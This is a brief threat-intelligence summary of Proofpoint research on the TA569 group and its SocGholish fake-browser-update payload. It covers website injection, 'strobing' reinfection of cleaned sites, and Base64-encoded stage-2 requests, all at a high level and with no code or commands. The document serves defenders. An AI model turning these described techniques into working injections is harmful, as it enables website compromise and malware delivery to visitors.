Go to listing page

Looking Deep into TA569 and its SocGholish Payload

Looking Deep into TA569 and its SocGholish Payload
TA569 is a highly active malicious entity that is primarily recognized for its utilization of website injections to introduce the SocGholish payload. Recently, researchers from Proofpoint have noted alterations in the TTPs adopted by TA569. The modifications involve a surge in the number of injection types and a shift to other payloads.

Diving into details

SocGholish is typically distributed through URLs that appear legitimate and are often included in benign automated emails or shared between users. 
  • The URLs lead to websites that were not designed with malicious intent, making them seem innocuous. 
  • The emails that contain these URLs can be in the form of newsletters or come from services such as Google Alerts.

Cliff notes on TA569

  • TA569 is an Initial Access Broker (IAB) that targets large organizations and sells access to other groups for follow-on attacks, including ransomware.
  • In addition to being an IAB, TA569 is believed to provide a pay-per-install service to other threat actors. 
  • The service allows customers to request specific payloads, which TA569 then delivers using its extensive network of injections and infrastructure.

Updates in TTPs

The threat group has been observed repeatedly reinfecting websites that have already undergone mitigation for malicious injections. This technique, known as strobing, allows the attacker to remove and reinstate injections to previously infected websites. 
  • Changes in injection methods include two primary categories - injections deploying SocGholish and injections deploying other payloads, known as Scriptzzbn injections.
  • The researchers saw a new type of inject and follow-up chain of requests that had not been previously used by TA569, on November 26, 2022. 
  • This chain ultimately resulted in the anticipated fake browser update and a JavaScript executable. 
  • To make a request to the actor-controlled stage 2 shadowed domain, the inject utilized a straightforward async script with a Uniform Resource Identifier (URI) encoded in Base64.

The bottom line

Proofpoint has published domain rules for TA569-controlled domains that can be monitored and blocked to prevent the download of malware payloads. Defendants are suggested to remain vigilant while evaluating alerts. Furthermore, educate end users about the TTPs used by this threat group.
Cyware Publisher